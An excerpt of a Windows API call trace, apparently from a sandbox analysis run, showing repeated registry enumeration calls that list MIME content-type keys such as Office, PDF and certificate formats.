[0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x10, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msword", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x11, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/opensearchdescription+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x12, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pdf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x13, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pkcs10", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x14, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pkcs7-mime", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x15, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pkcs7-signature", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x16, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pkix-cert", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x17, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/pkix-crl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x18, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/postscript", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x19, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/rss+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.acrobat-security-settings", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.pdfxml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.pdx", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.xdp+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.xfd+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.adobe.xfdf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x20, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.fdf", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x21, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x22, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x23, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel.addin.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x24, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel.sheet.binary.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x25, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel.sheet.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x26, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-excel.template.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x27, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-officetheme", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.297] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x28, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-pki.certstore", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x29, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-pki.pko", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-pki.seccat", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.addin.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.presentation.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.slide.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x30, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.slideshow.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x31, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-powerpoint.template.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x32, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-project", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x33, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-publisher", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x34, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.drawing", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x35, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.drawing.macroEnabled", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x36, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.stencil", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x37, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.stencil.macroEnabled", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x38, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x39, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.template.macroEnabled", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-visio.viewer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-word.document.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.298] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-word.document.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-word.template.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-word.template.macroEnabled.12", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-wpl", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x40, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.ms-xpsdocument", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x41, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.oasis.opendocument.presentation", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x42, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.oasis.opendocument.spreadsheet", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x43, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.oasis.opendocument.text", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x44, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.presentationml.presentation", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x45, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.presentationml.slide", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x46, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.presentationml.slideshow", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x47, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.presentationml.template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x48, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x49, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.spreadsheetml.template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.wordprocessingml.document", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.openxmlformats-officedocument.wordprocessingml.template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.visio", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/vnd.visio.webdrawing", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/windows-appcontent+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-complus", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.299] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x50, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-compress", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x51, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-compressed", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x52, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-dtcp1", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x53, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-gzip", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x54, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-java-applet", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x55, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-java-jnlp-file", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x56, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-jtx+xps", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x57, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-latex", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x58, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-mix-transfer", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x59, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-mplayer2", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5a, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-ms-application", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5b, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-ms-vsto", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5c, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-ms-wmd", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5d, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-ms-wmz", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5e, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/x-ms-xbap", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.300] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5f, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, 